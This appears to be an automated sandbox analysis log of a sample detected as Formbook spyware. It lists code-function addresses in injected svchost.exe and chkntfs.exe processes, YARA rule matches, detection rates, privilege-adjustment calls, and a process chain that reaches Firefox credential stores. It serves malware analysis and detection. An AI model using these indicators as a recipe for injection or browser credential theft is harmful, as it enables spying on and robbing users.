            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEEDB1_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEE261_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40E591_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B58DBF1_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3ADE01_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDCD1F1_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4AD001_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0CB51_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30CF21_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40C001_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B8739A1_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF132D1_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2D34C1_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B452A01_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5D2F01_2_03B5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE12ED1_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B2C01_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4B1B01_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0B16B1_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2F1721_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7516C1_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF70E91_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF0E01_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEF0CC1_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B470C01_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF7B01_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF16CC1_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B856301_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C095C31_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDD5B01_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF75711_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF43F1_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B314601_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FB801_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB5BF01_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7DBF91_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFB761_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDDAAC1_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B85AA01_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE1AA31_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEDAC61_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB3A6C1_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFA491_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7A461_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD59101_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B499501_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B9501_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B438E01_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAD8001_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFFB11_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B41F921_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD21_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD51_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFF091_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B49EB01_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FDC01_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7D731_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF1D5A1_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B43D401_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFCF21_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB9C321_2_03BB9C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045724463_2_04572446
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045644203_2_04564420
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0456E4F63_2_0456E4F6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C05353_2_044C0535
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045805913_2_04580591
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DC6E03_2_044DC6E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044E47503_2_044E4750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C07703_2_044C0770
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044BC7C03_2_044BC7C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045520003_2_04552000
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045481583_2_04548158
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B01003_2_044B0100
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0455A1183_2_0455A118
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045781CC3_2_045781CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045801AA3_2_045801AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045741A23_2_045741A2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045602743_2_04560274
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045402C03_2_045402C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457A3523_2_0457A352
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044CE3F03_2_044CE3F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045803E63_2_045803E6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C0C003_2_044C0C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B0CF23_2_044B0CF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04560CB53_2_04560CB5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0455CD1F3_2_0455CD1F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044CAD003_2_044CAD00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044BADE03_2_044BADE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044D8DBF3_2_044D8DBF
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C0E593_2_044C0E59
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457EE263_2_0457EE26
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457EEDB3_2_0457EEDB
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457CE933_2_0457CE93
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044D2E903_2_044D2E90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04534F403_2_04534F40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04562F303_2_04562F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04502F283_2_04502F28
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044E0F303_2_044E0F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B2FC83_2_044B2FC8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0453EFA03_2_0453EFA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044CA8403_2_044CA840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C28403_2_044C2840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044EE8F03_2_044EE8F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044A68B83_2_044A68B8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044D69623_2_044D6962
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C29A03_2_044C29A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0458A9A63_2_0458A9A6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044BEA803_2_044BEA80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457AB403_2_0457AB40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04576BD73_2_04576BD7
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B14603_2_044B1460
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457F43F3_2_0457F43F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045775713_2_04577571
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045895C33_2_045895C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0455D5B03_2_0455D5B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045056303_2_04505630
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045716CC3_2_045716CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457F7B03_2_0457F7B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C70C03_2_044C70C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0456F0CC3_2_0456F0CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457F0E03_2_0457F0E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045770E93_2_045770E9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044F516C3_2_044F516C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0458B16B3_2_0458B16B
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044AF1723_2_044AF172
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044CB1B03_2_044CB1B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DB2C03_2_044DB2C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045612ED3_2_045612ED
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DD2F03_2_044DD2F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C52A03_2_044C52A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044AD34C3_2_044AD34C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457132D3_2_0457132D
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0450739A3_2_0450739A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04539C323_2_04539C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457FCF23_2_0457FCF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C3D403_2_044C3D40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04571D5A3_2_04571D5A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04577D733_2_04577D73
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DFDC03_2_044DFDC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C9EB03_2_044C9EB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457FF093_2_0457FF09
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04483FD23_2_04483FD2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04483FD53_2_04483FD5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C1F923_2_044C1F92
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457FFB13_2_0457FFB1
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0452D8003_2_0452D800
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C38E03_2_044C38E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044C99503_2_044C9950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DB9503_2_044DB950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_045559103_2_04555910
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04577A463_2_04577A46
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457FA493_2_0457FA49
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04533A6C3_2_04533A6C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0456DAC63_2_0456DAC6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04505AA03_2_04505AA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04561AA33_2_04561AA3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0455DAAC3_2_0455DAAC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0457FB763_2_0457FB76
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04535BF03_2_04535BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044FDBF93_2_044FDBF9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044DFB803_2_044DFB80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D1E203_2_004D1E20
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004CCD0A3_2_004CCD0A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004CCD103_2_004CCD10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004CCF303_2_004CCF30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004CAFAE3_2_004CAFAE
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004CAFB03_2_004CAFB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D54D03_2_004D54D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D366A3_2_004D366A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D36AC3_2_004D36AC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D36B03_2_004D36B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004EBBD03_2_004EBBD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DE7603_2_042DE760
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DD7933_2_042DD793
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DD7C83_2_042DD7C8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DE2A83_2_042DE2A8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E532C3_2_042E532C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042D038E3_2_042D038E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DE3C33_2_042DE3C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042DCA833_2_042DCA83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 107 times
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: String function: 0099F9F2 appears 31 times
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: String function: 009A0A30 appears 46 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04507E54 appears 107 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 044AB970 appears 262 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 044F5130 appears 58 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0453F290 appears 103 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0452EA12 appears 86 times
            Source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003CFD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs p4LNUqyKZM.exe
            Source: p4LNUqyKZM.exe, 00000000.00000003.1694636578.0000000003B53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs p4LNUqyKZM.exe
            Source: p4LNUqyKZM.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@12/8
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F37B5 GetLastError,FormatMessageW,0_2_009F37B5
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E10BF AdjustTokenPrivileges,CloseHandle,0_2_009E10BF
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009E16C3
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009F51CD
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A0A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A0A67C
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_009F648E
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009842A2
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeFile created: C:\Users\user\AppData\Local\Temp\aut5EB9.tmpJump to behavior
            Source: p4LNUqyKZM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: chkntfs.exe, 00000003.00000002.3535509329.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2070016942.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2066892998.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2066152920.0000000000817000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: p4LNUqyKZM.exeReversingLabs: Detection: 42%
            Source: p4LNUqyKZM.exeVirustotal: Detection: 37%
            Source: unknownProcess created: C:\Users\user\Desktop\p4LNUqyKZM.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"Jump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: kernel.appcore.dllJump to behavior
